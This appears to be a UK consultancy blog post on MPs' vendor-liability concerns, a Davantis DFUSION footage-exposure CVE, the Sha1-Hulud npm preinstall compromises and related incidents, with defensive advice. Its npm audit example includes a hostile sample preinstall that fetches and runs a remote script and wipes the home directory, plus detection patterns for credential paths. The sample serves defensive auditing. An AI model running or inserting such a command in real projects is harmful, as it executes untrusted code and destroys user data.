MPs Sound the Alarm: CCTV Flaw and 25,000 npm Hijacks Show Why Software Firms Must Be Held Accountable

Why a CCTV bug, 25,000 npm hijacks and MPs’ alarm bells are now part of the same security headache

Britain’s economic security debate has leapt from committee rooms to camera feeds and developer machines after a flurry of incidents this morning: a high‑severity vulnerability in Davantis’ DFUSION camera platform, mass npm preinstall hijacks affecting tens of thousands of repositories, and renewed calls from MPs that software vendors must be held to account for national economic resilience. It’s the kind of perfect storm that keeps cyber teams awake — and we at Synergos Consultancy have been quietly stocking up on strong coffee and sound advice.

The immediate worry: CVE‑2025‑41016 exposes camera footage

Published 44 minutes ago, CVE‑2025‑41016 affects Davantis DFUSION v6.177.7 and is rated 8.7 (HIGH). According to the advisory supplied, an inadequate access control flaw allows unauthorised actors to retrieve images and videos tied to alarm events via the “/alarms//” endpoint when the MEDIA parameter is set to “snapshot” or “video.mp4”. In plain English: footage recorded by security cameras in response to alerts can be pulled out by someone who ought not to have access.

That’s not just an embarrassment for a vendor; it’s an operational and privacy risk for any organisation that relies on that kit for perimeter detection or forensic evidence. Imagine a burglar getting the CCTV feed of the very alarm that would have caught them — awkward for insurers, worse for operations.

Supply‑chain sightings: Sha1‑Hulud and EtherHiding

At the same time, security vendors are warning that Sha1‑Hulud has compromised more than 25,000 GitHub repositories via malicious npm preinstall packages, designed to steal cloud credentials or even wipe developers’ home directories. This is supply‑chain nastiness at scale: a single poisoned dependency can turn a dev machine into a vault of credentials.

Meanwhile, the EtherHiding technique is being used to deliver and rotate malware payloads via web pages disguised as CAPTCHAs, with blockchain smart contracts used to update the malicious code. It’s clever, it’s ugly, and it underlines how attackers are blending decentralised tech with social‑engineering vectors.

Why MPs are shouting about vendor liability — and why it matters

An influential committee of MPs has warned that the lack of liability for software vendors is putting Britain’s economic and national security at risk. Their argument is straightforward: when vendors face little legal or financial consequence for unsafe design, critical systems remain fragile and the wider economy becomes exposed.

Those concerns feed directly into today’s technical stories. A vulnerability that exposes camera footage is more than a product bug — it’s a potential national‑security and privacy incident when cameras sit on critical infrastructure or within supply‑chain partners. Likewise, mass npm compromises show how weaknesses in the software ecosystem ripple outwards.

Third‑party vendor attacks: banks and beyond

Also reported today: several major banks have been affected by a cyber‑attack on a third‑party tech vendor, potentially exposing customer data. This is another piece of the same puzzle — when vendors or contractors aren’t held to rigorous standards, downstream organisations pay the price.

Expert reminder: good processes beat glamour tech

As Greg Van Der Gaast, Managing Director of Sequoia Consulting and former hacker, observed: many attackers will simply wait for a vulnerability to appear; what matters is how quickly organisations find and fix those issues. Well‑designed systems and fast remediation reduce the window of opportunity for attackers — a lesson that applies whether you’re running CCTV platforms, cloud workloads, or npm packages.

Practical steps Synergos Consultancy would be emphasising right now

  1. Prioritise immediate risk triage for exposed assets: identify any DFUSION instances, isolate them, and treat logs and footage as potentially compromised evidence.
  2. Apply vendor‑supplied patches or mitigations where available, and if none exist, implement compensating controls such as network segmentation and strict media access controls.
  3. Harden developer environments: block untrusted preinstall scripts, audit dependencies, and apply least privilege to CI/CD and cloud credentials.
  4. Review third‑party risk: confirm which suppliers have access to sensitive data and test contractual liability, insurance and incident response obligations.
  5. Exercise incident response and evidence preservation plans — camera footage, like logs, can be both evidence and proof of compromise.
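As an added example (not code from the article, from Synergos, or from any npm tooling), the audit below illustrates step 3: it scans package manifests for install-time lifecycle scripts, the hook the Sha1‑Hulud preinstall packages abused, and flags commands matching a few heuristic patterns for human review. The manifests and the regex list are constructed assumptions for illustration; in practice you would feed it each node_modules/<pkg>/package.json, and pair it with npm's `ignore-scripts=true` setting so no lifecycle script runs unreviewed.

```javascript
// Constructed example: audit npm lifecycle scripts that run automatically on
// `npm install`. A clean result is not proof of safety; the patterns are only
// heuristics to prioritise which dependencies a human looks at first.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic patterns (assumed, not an official list): remote fetch piped into an
// interpreter, destructive deletes, credential and config paths, obfuscation.
const SUSPICIOUS_PATTERNS = [
  /\b(curl|wget)\b/i,
  /\|\s*(sh|bash|node)\b/,
  /\brm\s+-rf\b/,
  /\.aws\b|\.npmrc\b|\.ssh\b|\$HOME\b|~\//,
  /base64\s+-d\b|\beval\(/,
];

// Returns one finding per lifecycle hook present in the manifest.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const cmd = String(scripts[hook]);
    const hits = SUSPICIOUS_PATTERNS.filter((re) => re.test(cmd)).length;
    findings.push({ name: manifest.name, hook, cmd, suspicious: hits > 0 });
  }
  return findings;
}

// Audit a list of parsed package.json objects (e.g. everything under node_modules).
function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests: a benign native build step, a package whose
// preinstall fetches and runs remote code then wipes the home directory (the
// behaviour the article describes), and a library with no lifecycle hooks.
const SAMPLE_MANIFESTS = [
  { name: "good-native-addon", version: "1.0.0", scripts: { install: "node-gyp rebuild", test: "jest" } },
  { name: "typo-squat-pkg", version: "0.0.3", scripts: { preinstall: "curl -s https://example.invalid/x.sh | sh && rm -rf $HOME" } },
  { name: "plain-lib", version: "2.1.0", scripts: { build: "tsc" } },
];

for (const f of auditAll(SAMPLE_MANIFESTS)) {
  console.log(`${f.suspicious ? "ALERT" : "info "} ${f.name} ${f.hook}: ${f.cmd}`);
}
```

Run it against real manifests by replacing SAMPLE_MANIFESTS with the parsed package.json files under node_modules; anything marked ALERT should be quarantined and reviewed before the next install.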

We’re not pretending process is sexy, but as the old adage goes, prevention is cheaper than forensics — and far less embarrassing.

What organisations in the UK should watch next

  • MPs’ recommendations and any moves to enshrine vendor liability in law — this could change procurement and contractual risk apportionment.
  • Vendor advisories for Davantis DFUSION and any patches or mitigation guidance they release.
  • Indicators of compromise for Sha1‑Hulud and EtherHiding, plus any related advisories from major security vendors.
  • Notifications from financial institutions or their vendors about the scale and nature of the third‑party incident affecting banks.

There’s a policy angle too: calls for an Economic Security Bill and a dedicated Economic Security Minister suggest lawmakers want bite as well as bark. If liability becomes law, suppliers will face greater pressure to design securely rather than rely on post‑facto fixes — and that’s exactly the sort of structural change that could cut down the noise of repeat incidents.

If you want a straight answer from Synergos Consultancy: strengthen your basic hygiene, hunt for exposed camera platforms, lock down developer environments, and treat vendor contracts like part of your defensive architecture. It’s not glamorous, but it works.

Breaches, leaks and clever malware are the new normal; what’s not normal is accepting that vendors can ship fragile software without accountability. Today’s trio of stories — CVE‑2025‑41016, Sha1‑Hulud mass compromises, and the vendor‑related bank incident — are a reminder that technical detail, legal frameworks and good process must all line up, otherwise we’re simply handing attackers the keys and asking them politely to leave when they’re done.

The industry will talk, regulators will consider next steps, and practitioners will patch and monitor. In the meantime, keep an eye on your cameras — and perhaps don’t invite the burglars to the viewing party.

Adam Cooke
As the Operations and Compliance Manager, Adam oversees all aspects of the business, ensuring operational efficiency and regulatory compliance. Committed to high standards, he ensures everyone is heard and supported. With a strong background in the railway industry, Adam values rigorous standards and safety. Outside of work, he enjoys dog walking, gardening, and exploring new places and cuisines.